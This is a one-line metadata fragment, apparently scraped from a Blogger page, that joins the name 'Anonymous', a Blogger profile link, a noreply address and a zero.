Anonymoushttp://www.blogger.com/profile/07749275617346769080noreply@blogger.com0